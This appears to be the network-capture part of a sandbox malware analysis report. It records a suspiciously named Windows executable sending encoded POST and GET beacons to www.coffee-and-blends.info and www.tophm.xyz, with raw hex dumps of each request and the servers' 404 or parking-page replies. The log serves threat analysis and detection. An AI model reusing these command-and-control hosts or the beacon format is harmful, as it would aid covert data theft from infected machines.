                                                    Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.949990217.160.0.231806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:45.892370939 CEST829OUTPOST /fhdl/ HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.coffee-and-blends.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 218
                                                    Cache-Control: no-cache
                                                    Referer: http://www.coffee-and-blends.info/fhdl/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 47 62 79 43 5a 51 31 77 66 78 70 70 6d 72 72 4e 2f 59 68 32 6d 63 70 72 47 65 57 79 67 6a 53 5a 51 55 69 30 39 57 44 52 37 61 32 41 4f 33 72 73 46 64 56 50 73 4c 78 32 51 70 51 4b 67 69 2f 38 62 73 45 50 58 73 4f 64 31 6a 4e 68 4a 49 71 46 68 43 6b 46 75 41 5a 6c 54 51 69 57 56 65 36 53 66 36 56 50 41 66 34 39 41 4a 77 30 75 36 50 79 50 2f 57 49 39 32 51 6b 56 4b 51 43 39 2b 7a 2f 43 78 73 6c 78 38 46 38 31 45 37 42 45 4d 6a 71 47 51 32 65 6b 55 2f 35 31 71 4e 38 31 6c 77 65 63 47 65 35 2f 47 6d 36 6d 37 45 31 42 31 77 68 50 45 77 65 66 76 6c 34 64 53 55 33 53 58 53 32 72 7a 6d 37 79 4d 34 49 50 76 32 72 6c 4c 51 7a 65 51 3d 3d
                                                    Data Ascii: 8T2hn=GbyCZQ1wfxppmrrN/Yh2mcprGeWygjSZQUi09WDR7a2AO3rsFdVPsLx2QpQKgi/8bsEPXsOd1jNhJIqFhCkFuAZlTQiWVe6Sf6VPAf49AJw0u6PyP/WI92QkVKQC9+z/Cxslx8F81E7BEMjqGQ2ekU/51qN81lwecGe5/Gm6m7E1B1whPEwefvl4dSU3SXS2rzm7yM4IPv2rlLQzeQ==
                                                    Oct 9, 2024 14:02:46.528211117 CEST779INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 09 Oct 2024 12:02:46 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Content-Encoding: gzip
                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                    Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.949991217.160.0.231806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:48.490209103 CEST1842OUTPOST /fhdl/ HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.coffee-and-blends.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1230
                                                    Cache-Control: no-cache
                                                    Referer: http://www.coffee-and-blends.info/fhdl/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 47 62 79 43 5a 51 31 77 66 78 70 70 6d 72 72 4e 2f 59 68 32 6d 63 70 72 47 65 57 79 67 6a 53 5a 51 55 69 30 39 57 44 52 37 61 2b 41 4f 43 2f 73 46 2b 74 50 72 4c 78 32 54 70 51 4c 67 69 2f 68 62 73 63 4c 58 73 54 67 31 67 6c 68 4b 71 79 46 6d 77 41 46 39 67 5a 6c 64 41 69 74 4b 4f 37 50 66 36 46 4c 41 66 6f 39 41 4a 77 30 75 37 2f 79 50 75 57 49 36 47 51 6a 43 36 51 34 71 75 7a 58 43 78 30 55 78 38 77 4a 31 31 62 42 46 73 7a 71 45 6a 65 65 74 55 2f 6e 32 71 4e 6b 31 6b 4d 2f 63 47 43 66 2f 47 43 41 6d 35 55 31 4e 44 35 36 66 6c 51 63 49 4d 4a 78 51 42 49 58 59 78 4b 4a 70 43 47 38 76 76 59 58 63 64 44 31 6f 34 56 48 4d 68 33 56 6a 52 79 6c 71 57 35 51 71 47 32 48 45 77 56 79 6c 30 58 4c 36 6a 46 6f 51 6d 55 67 36 32 6a 76 61 38 35 6d 32 49 72 6e 51 62 6a 59 2f 4e 7a 59 72 30 34 78 49 6a 37 33 62 79 50 4f 75 63 75 46 76 72 67 6d 6f 48 79 4e 59 31 55 43 35 70 72 66 58 74 68 56 73 56 4f 30 70 76 69 4e 41 4c 31 59 58 54 7a 51 68 59 57 69 58 50 6a 4c 56 58 36 6e 39 4d 41 41 68 53 2f 65 [TRUNCATED]
                                                    Data Ascii: 8T2hn=GbyCZQ1wfxppmrrN/Yh2mcprGeWygjSZQUi09WDR7a+AOC/sF+tPrLx2TpQLgi/hbscLXsTg1glhKqyFmwAF9gZldAitKO7Pf6FLAfo9AJw0u7/yPuWI6GQjC6Q4quzXCx0Ux8wJ11bBFszqEjeetU/n2qNk1kM/cGCf/GCAm5U1ND56flQcIMJxQBIXYxKJpCG8vvYXcdD1o4VHMh3VjRylqW5QqG2HEwVyl0XL6jFoQmUg62jva85m2IrnQbjY/NzYr04xIj73byPOucuFvrgmoHyNY1UC5prfXthVsVO0pviNAL1YXTzQhYWiXPjLVX6n9MAAhS/e5h77W7eqltpBNO4HVtfPLyEz2Z9bgmTA08k6HTPHQASKFJ02WhY0rgSYkNVEW0hJBlsLsPvnwE6hCj2h8PAIfifllcPUYW3kXcxuPapVUYqbqRV0n0yLDac9AghVHmCZSNdoGrrGdDDmVwUjhwsFQmrC+ztfMehDW60Xfc4LqdSc2d6MMRaM6tnU1dQdXB7wJj3um6ml6GaYM6G5sUZEgmdvaR29JiWalzMXlrGixcERpKL6lbzhCcayLtwm080M77yQLDO02G64FAyqLUqTucSsjT9+9jgXCLpKgyj6qB0MdM94y6/UnkbIC1KrPnTTh8czxBo4lIjIyYjC20fte22uQXnR8kDsEhZur9jUKTajggzj7FaY3mZk2Ll1gMxOgoFBqVx4ljl525ZbVtVxKA/Mn4PKGESh0ikwFWl5tBs2k9+0JIAz7mwJd46+PDvYpbqnAKHdHdEZrMzOzXpJOpWKJgwxmqnvKuFGaL4wlb1eOpSnuts/kcBCRpCL7fmXIdZHW+msQnunpJ6wLmTDXxL9wVMYKnsL6RhmuKjxELWW6kzJiL65Xk1B2FJ6byJkGsluQRIhqNfjfg7ju6kbEGO3umpXHYjP4wrtdbzStWRgFLUpSTLIGZmdjK33M5H30eIiqxEY7sD25jo0+9pg6Rq9FDYIRgtmWR [TRUNCATED]
                                                    Oct 9, 2024 14:02:49.191828012 CEST779INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 09 Oct 2024 12:02:49 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Content-Encoding: gzip
                                                    Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                    Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.949992217.160.0.231806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:51.068710089 CEST522OUTGET /fhdl/?8T2hn=LZaialQPeltHsffZ/7p0gpt1IPXssyuTEG6qh16Ey8GBHHnvE/VN849lTokelyHAfcJ0dO++uyhAerPT/GlJwSRZaBuTZ4zvU4RSMcEjcessmo3sdA==&wZBh=UzoT8ph HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Oct 9, 2024 14:02:51.703099012 CEST1236INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Content-Length: 1271
                                                    Connection: close
                                                    Date: Wed, 09 Oct 2024 12:02:51 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                    Oct 9, 2024 14:02:51.703176975 CEST203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                                    Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.949993199.192.21.169806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:56.771025896 CEST766OUTPOST /30rz/ HTTP/1.1
                                                    Host: www.tophm.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.tophm.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 194
                                                    Cache-Control: no-cache
                                                    Referer: http://www.tophm.xyz/30rz/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 39 66 54 47 37 54 37 44 35 73 41 47 31 6f 55 46 68 72 47 4a 38 39 56 53 2b 55 61 49 6d 7a 66 50 39 66 39 35 43 51 4c 54 6f 36 62 4b 53 45 32 78 77 77 6a 43 42 43 57 43 79 6c 43 73 73 59 5a 78 4e 36 4e 4c 45 58 57 4f 6f 47 41 66 6f 38 32 70 65 42 4c 6a 35 35 42 6e 78 72 45 52 43 41 5a 59 4a 33 69 4b 61 53 56 64 52 76 79 58 2b 50 54 44 56 78 64 74 48 61 42 66 36 63 31 62 32 48 34 71 51 6c 58 50 50 34 47 77 46 41 4c 79 6d 6a 4e 39 66 78 64 4f 62 65 33 47 30 50 50 6b 50 43 62 54 65 44 30 6f 33 49 65 4f 72 54 4e 57 48 44 71 4a 64 53 69 77 78 48 31 51 4b 6c 48 7a
                                                    Data Ascii: 8T2hn=9fTG7T7D5sAG1oUFhrGJ89VS+UaImzfP9f95CQLTo6bKSE2xwwjCBCWCylCssYZxN6NLEXWOoGAfo82peBLj55BnxrERCAZYJ3iKaSVdRvyX+PTDVxdtHaBf6c1b2H4qQlXPP4GwFALymjN9fxdObe3G0PPkPCbTeD0o3IeOrTNWHDqJdSiwxH1QKlHz
                                                    Oct 9, 2024 14:02:57.355895042 CEST980INHTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:02:57 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 774
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.949994199.192.21.169806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:02:59.311409950 CEST790OUTPOST /30rz/ HTTP/1.1
                                                    Host: www.tophm.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.tophm.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 218
                                                    Cache-Control: no-cache
                                                    Referer: http://www.tophm.xyz/30rz/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 39 66 54 47 37 54 37 44 35 73 41 47 33 49 6b 46 6a 4b 47 4a 30 39 56 56 78 30 61 49 78 6a 65 45 39 66 68 35 43 52 2f 44 6f 50 44 4b 52 6d 75 78 7a 78 6a 43 47 43 57 43 39 46 43 70 78 49 5a 32 4e 36 4a 35 45 57 47 4f 6f 43 51 66 6f 34 79 70 66 79 6a 67 34 70 42 6c 36 4c 45 58 64 77 5a 59 4a 33 69 4b 61 53 42 33 52 76 36 58 2b 65 6a 44 61 77 63 37 4b 36 42 41 74 73 31 62 67 33 35 68 51 6c 58 35 50 35 61 61 46 44 6a 79 6d 6d 78 39 65 6c 42 4e 55 65 33 41 34 66 4f 59 65 58 47 78 54 52 6f 6a 77 72 2f 71 71 51 35 7a 45 69 4b 58 4d 67 72 72 6b 51 31 33 4e 43 4f 62 45 70 63 4d 4b 4c 31 54 7a 52 77 46 66 75 44 4e 4b 56 4e 51 6e 51 3d 3d
                                                    Data Ascii: 8T2hn=9fTG7T7D5sAG3IkFjKGJ09VVx0aIxjeE9fh5CR/DoPDKRmuxzxjCGCWC9FCpxIZ2N6J5EWGOoCQfo4ypfyjg4pBl6LEXdwZYJ3iKaSB3Rv6X+ejDawc7K6BAts1bg35hQlX5P5aaFDjymmx9elBNUe3A4fOYeXGxTRojwr/qqQ5zEiKXMgrrkQ13NCObEpcMKL1TzRwFfuDNKVNQnQ==
                                                    Oct 9, 2024 14:02:59.899641991 CEST980INHTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:02:59 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 774
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.949995199.192.21.169806280C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 9, 2024 14:03:01.862705946 CEST1803OUTPOST /30rz/ HTTP/1.1
                                                    Host: www.tophm.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.tophm.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1230
                                                    Cache-Control: no-cache
                                                    Referer: http://www.tophm.xyz/30rz/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 39 66 54 47 37 54 37 44 35 73 41 47 33 49 6b 46 6a 4b 47 4a 30 39 56 56 78 30 61 49 78 6a 65 45 39 66 68 35 43 52 2f 44 6f 50 4c 4b 52 54 79 78 77 53 37 43 48 43 57 43 77 6c 43 6f 78 49 5a 72 4e 2b 64 39 45 54 66 37 6f 41 59 66 71 64 6d 70 50 54 6a 67 68 35 42 6c 31 72 45 57 43 41 5a 42 4a 33 53 4f 61 53 52 33 52 76 36 58 2b 63 37 44 54 42 63 37 49 36 42 66 36 63 31 66 32 48 35 4a 51 6c 4f 4d 50 35 75 67 45 7a 44 79 6e 47 42 39 53 77 64 4e 4c 75 33 43 37 66 4f 41 65 58 43 48 54 52 30 6e 77 71 4b 2f 71 51 42 7a 48 58 7a 67 58 67 6a 6b 35 77 46 55 45 43 61 51 4c 2b 45 4d 53 71 34 42 75 7a 5a 67 45 73 65 6a 4f 68 4d 39 79 65 57 62 39 33 39 56 59 4e 35 66 73 46 74 58 33 4f 31 7a 65 69 64 55 7a 32 7a 77 78 58 4f 4b 36 54 47 32 4c 33 73 42 48 4e 4f 72 78 31 78 6e 4a 6a 78 39 4d 33 64 64 6e 57 58 57 31 45 30 4c 68 69 48 55 74 58 59 36 51 2b 45 2b 49 62 6e 48 55 58 35 67 30 48 42 43 67 77 38 57 30 79 61 42 73 35 33 77 37 55 30 43 47 63 49 47 44 45 47 6b 6e 64 30 61 62 4e 4b 73 44 6c 70 64 [TRUNCATED]
